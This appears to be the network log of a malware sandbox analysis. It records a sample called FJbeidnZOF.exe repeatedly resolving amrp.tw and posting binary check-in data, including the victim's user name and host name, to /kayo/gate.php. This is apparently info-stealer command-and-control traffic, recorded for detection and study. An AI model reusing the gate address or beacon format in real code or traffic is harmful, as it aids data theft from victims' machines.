                                            Apr 29, 2021 09:20:26.056761026 CEST53558048.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:27.231012106 CEST5807953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:27.280750036 CEST53580798.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:28.440010071 CEST5208053192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:28.491605997 CEST53520808.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:29.635910988 CEST5523853192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:29.685062885 CEST53552388.8.8.8192.168.2.3
                                            Apr 29, 2021 09:20:30.821522951 CEST4928953192.168.2.38.8.8.8
                                            Apr 29, 2021 09:20:30.883424997 CEST53492898.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Apr 29, 2021 09:18:43.908260107 CEST192.168.2.38.8.8.80x2b69Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:45.509217024 CEST192.168.2.38.8.8.80x8e1cStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:46.625754118 CEST192.168.2.38.8.8.80x4fc8Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:47.960091114 CEST192.168.2.38.8.8.80xcd34Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:49.523097038 CEST192.168.2.38.8.8.80x480dStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:50.755672932 CEST192.168.2.38.8.8.80x1402Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:52.032917976 CEST192.168.2.38.8.8.80x6b96Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:53.266635895 CEST192.168.2.38.8.8.80xd84fStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:54.710226059 CEST192.168.2.38.8.8.80x5926Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:55.942588091 CEST192.168.2.38.8.8.80x22a2Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:57.186348915 CEST192.168.2.38.8.8.80xfa8fStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:58.425035954 CEST192.168.2.38.8.8.80xa774Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:59.722589970 CEST192.168.2.38.8.8.80x61ccStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:01.088252068 CEST192.168.2.38.8.8.80x9a4cStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:02.430881023 CEST192.168.2.38.8.8.80x43c6Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:04.103687048 CEST192.168.2.38.8.8.80xfe5aStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:05.360806942 CEST192.168.2.38.8.8.80x17f9Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:06.778059959 CEST192.168.2.38.8.8.80x2a1eStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:08.041354895 CEST192.168.2.38.8.8.80xccaaStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:09.546783924 CEST192.168.2.38.8.8.80xc64cStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:10.954329014 CEST192.168.2.38.8.8.80x68e0Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:12.173955917 CEST192.168.2.38.8.8.80x2876Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:13.673806906 CEST192.168.2.38.8.8.80xce16Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:14.969868898 CEST192.168.2.38.8.8.80x29d3Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:16.470176935 CEST192.168.2.38.8.8.80xafacStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:18.035713911 CEST192.168.2.38.8.8.80x6b8Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:19.365402937 CEST192.168.2.38.8.8.80x13c4Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:21.870687008 CEST192.168.2.38.8.8.80x9871Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:23.167947054 CEST192.168.2.38.8.8.80x7b23Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:24.410850048 CEST192.168.2.38.8.8.80x78b1Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:25.627330065 CEST192.168.2.38.8.8.80xf5e4Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:26.869585991 CEST192.168.2.38.8.8.80x52beStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:28.094182968 CEST192.168.2.38.8.8.80xa4f5Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:29.350225925 CEST192.168.2.38.8.8.80x4bc1Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:30.584069967 CEST192.168.2.38.8.8.80xd129Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:31.887809038 CEST192.168.2.38.8.8.80xdc08Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:33.286051035 CEST192.168.2.38.8.8.80xa855Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:34.566128969 CEST192.168.2.38.8.8.80x61c5Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:36.116091967 CEST192.168.2.38.8.8.80x5df7Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:37.507352114 CEST192.168.2.38.8.8.80xb5dbStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:38.747144938 CEST192.168.2.38.8.8.80xb1Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:40.022133112 CEST192.168.2.38.8.8.80xa5e3Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:41.491259098 CEST192.168.2.38.8.8.80x2888Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:42.701021910 CEST192.168.2.38.8.8.80xd791Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:43.965801954 CEST192.168.2.38.8.8.80x1901Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:45.185405970 CEST192.168.2.38.8.8.80x447aStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:46.400294065 CEST192.168.2.38.8.8.80xeec3Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:47.609278917 CEST192.168.2.38.8.8.80x1f27Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:48.818216085 CEST192.168.2.38.8.8.80xed14Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:50.033618927 CEST192.168.2.38.8.8.80xe8caStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:51.255209923 CEST192.168.2.38.8.8.80xf569Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:52.671220064 CEST192.168.2.38.8.8.80xd945Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:54.067848921 CEST192.168.2.38.8.8.80xfafaStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:56.180576086 CEST192.168.2.38.8.8.80xd452Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:57.420135021 CEST192.168.2.38.8.8.80x13f0Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:58.629303932 CEST192.168.2.38.8.8.80xf5a2Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:59.913496017 CEST192.168.2.38.8.8.80x7159Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:01.143604994 CEST192.168.2.38.8.8.80x4a53Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:02.340274096 CEST192.168.2.38.8.8.80xe7dcStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:03.541687965 CEST192.168.2.38.8.8.80xa455Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:04.762628078 CEST192.168.2.38.8.8.80xfc3aStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:05.955463886 CEST192.168.2.38.8.8.80xfe32Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:07.380706072 CEST192.168.2.38.8.8.80x512Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:08.573776007 CEST192.168.2.38.8.8.80xddebStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:09.775473118 CEST192.168.2.38.8.8.80xa236Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:11.026552916 CEST192.168.2.38.8.8.80x55f2Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:12.237430096 CEST192.168.2.38.8.8.80x9cecStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:13.507350922 CEST192.168.2.38.8.8.80xa5edStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:15.456970930 CEST192.168.2.38.8.8.80x5a42Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:16.708456039 CEST192.168.2.38.8.8.80x1418Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:17.914839029 CEST192.168.2.38.8.8.80xf989Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:19.668833971 CEST192.168.2.38.8.8.80x8bd5Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:20.892060041 CEST192.168.2.38.8.8.80x25abStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:22.123450994 CEST192.168.2.38.8.8.80xe3cStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:23.567308903 CEST192.168.2.38.8.8.80xf6b3Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:24.787410021 CEST192.168.2.38.8.8.80x151aStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:26.005192995 CEST192.168.2.38.8.8.80xc0b8Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:27.231012106 CEST192.168.2.38.8.8.80x9e8eStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:28.440010071 CEST192.168.2.38.8.8.80x22beStandard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:29.635910988 CEST192.168.2.38.8.8.80xda47Standard query (0)amrp.twA (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:30.821522951 CEST192.168.2.38.8.8.80x2f7aStandard query (0)amrp.twA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Apr 29, 2021 09:18:44.239553928 CEST8.8.8.8192.168.2.30x2b69No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:45.561718941 CEST8.8.8.8192.168.2.30x8e1cNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:46.687691927 CEST8.8.8.8192.168.2.30x4fc8No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:48.282706022 CEST8.8.8.8192.168.2.30xcd34No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:49.588376045 CEST8.8.8.8192.168.2.30x480dNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:50.812793970 CEST8.8.8.8192.168.2.30x1402No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:52.081583977 CEST8.8.8.8192.168.2.30x6b96No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:53.318711996 CEST8.8.8.8192.168.2.30xd84fNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:54.767065048 CEST8.8.8.8192.168.2.30x5926No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:56.004842997 CEST8.8.8.8192.168.2.30x22a2No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:57.235091925 CEST8.8.8.8192.168.2.30xfa8fNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:58.484735966 CEST8.8.8.8192.168.2.30xa774No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:18:59.771270990 CEST8.8.8.8192.168.2.30x61ccNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:01.145457029 CEST8.8.8.8192.168.2.30x9a4cNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:02.479594946 CEST8.8.8.8192.168.2.30x43c6No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:04.152384043 CEST8.8.8.8192.168.2.30xfe5aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:05.409497023 CEST8.8.8.8192.168.2.30x17f9No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:06.837114096 CEST8.8.8.8192.168.2.30x2a1eNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:08.379918098 CEST8.8.8.8192.168.2.30xccaaNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:09.595403910 CEST8.8.8.8192.168.2.30xc64cNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:11.014369965 CEST8.8.8.8192.168.2.30x68e0No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:12.231287003 CEST8.8.8.8192.168.2.30x2876No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:13.730776072 CEST8.8.8.8192.168.2.30xce16No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:15.018480062 CEST8.8.8.8192.168.2.30x29d3No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:16.796936035 CEST8.8.8.8192.168.2.30xafacNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:18.092744112 CEST8.8.8.8192.168.2.30x6b8No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:19.426115036 CEST8.8.8.8192.168.2.30x13c4No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:21.933243036 CEST8.8.8.8192.168.2.30x9871No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:23.227627039 CEST8.8.8.8192.168.2.30x7b23No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:24.459515095 CEST8.8.8.8192.168.2.30x78b1No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:25.684412956 CEST8.8.8.8192.168.2.30xf5e4No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:26.919786930 CEST8.8.8.8192.168.2.30x52beNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:28.144623995 CEST8.8.8.8192.168.2.30xa4f5No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:29.400669098 CEST8.8.8.8192.168.2.30x4bc1No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:30.643527031 CEST8.8.8.8192.168.2.30xd129No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:31.950686932 CEST8.8.8.8192.168.2.30xdc08No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:33.343103886 CEST8.8.8.8192.168.2.30xa855No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:34.888900995 CEST8.8.8.8192.168.2.30x61c5No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:36.164630890 CEST8.8.8.8192.168.2.30x5df7No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:37.556483030 CEST8.8.8.8192.168.2.30xb5dbNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:38.812598944 CEST8.8.8.8192.168.2.30xb1No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:40.082376003 CEST8.8.8.8192.168.2.30xa5e3No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:41.539858103 CEST8.8.8.8192.168.2.30x2888No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:42.752437115 CEST8.8.8.8192.168.2.30xd791No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:44.017335892 CEST8.8.8.8192.168.2.30x1901No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:45.234781027 CEST8.8.8.8192.168.2.30x447aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:46.451890945 CEST8.8.8.8192.168.2.30xeec3No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:47.658653975 CEST8.8.8.8192.168.2.30x1f27No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:48.866684914 CEST8.8.8.8192.168.2.30xed14No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:50.082341909 CEST8.8.8.8192.168.2.30xe8caNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:51.312139988 CEST8.8.8.8192.168.2.30xf569No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:52.719798088 CEST8.8.8.8192.168.2.30xd945No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:54.116540909 CEST8.8.8.8192.168.2.30xfafaNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:56.242844105 CEST8.8.8.8192.168.2.30xd452No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:57.469484091 CEST8.8.8.8192.168.2.30x13f0No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:58.686525106 CEST8.8.8.8192.168.2.30xf5a2No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:19:59.962209940 CEST8.8.8.8192.168.2.30x7159No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:01.195081949 CEST8.8.8.8192.168.2.30x4a53No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:02.389657974 CEST8.8.8.8192.168.2.30xe7dcNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:03.590300083 CEST8.8.8.8192.168.2.30xa455No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:04.811296940 CEST8.8.8.8192.168.2.30xfc3aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:06.004157066 CEST8.8.8.8192.168.2.30xfe32No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:07.429529905 CEST8.8.8.8192.168.2.30x512No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:08.622603893 CEST8.8.8.8192.168.2.30xddebNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:09.824177027 CEST8.8.8.8192.168.2.30xa236No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:11.075330019 CEST8.8.8.8192.168.2.30x55f2No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:12.299365997 CEST8.8.8.8192.168.2.30x9cecNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:13.556083918 CEST8.8.8.8192.168.2.30xa5edNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:15.505681992 CEST8.8.8.8192.168.2.30x5a42No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:16.760174990 CEST8.8.8.8192.168.2.30x1418No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:17.972099066 CEST8.8.8.8192.168.2.30xf989No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:19.717551947 CEST8.8.8.8192.168.2.30x8bd5No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:20.940669060 CEST8.8.8.8192.168.2.30x25abNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:22.172164917 CEST8.8.8.8192.168.2.30xe3cNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:23.616051912 CEST8.8.8.8192.168.2.30xf6b3No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:24.835859060 CEST8.8.8.8192.168.2.30x151aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:26.056761026 CEST8.8.8.8192.168.2.30xc0b8No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:27.280750036 CEST8.8.8.8192.168.2.30x9e8eNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:28.491605997 CEST8.8.8.8192.168.2.30x22beNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:29.685062885 CEST8.8.8.8192.168.2.30xda47No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:30.883424997 CEST8.8.8.8192.168.2.30x2f7aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • amrp.tw

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.34972135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:44.502475977 CEST1120OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 190
                                            Connection: close
                                            Apr 29, 2021 09:18:44.757561922 CEST1125OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771k08F9C4E9C79A3B52B3F739430m2vo9
                                            Apr 29, 2021 09:18:45.282027006 CEST1132INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.34972335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:45.816121101 CEST1135OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 190
                                            Connection: close
                                            Apr 29, 2021 09:18:46.066150904 CEST1142OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771+08F9C4E9C79A3B52B3F7394305FgqE
                                            Apr 29, 2021 09:18:46.533708096 CEST1148INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            10192.168.2.34973935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:57.489684105 CEST1232OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:57.738857985 CEST1233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:58.212582111 CEST1233INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            11192.168.2.34974035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:58.739295959 CEST1234OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
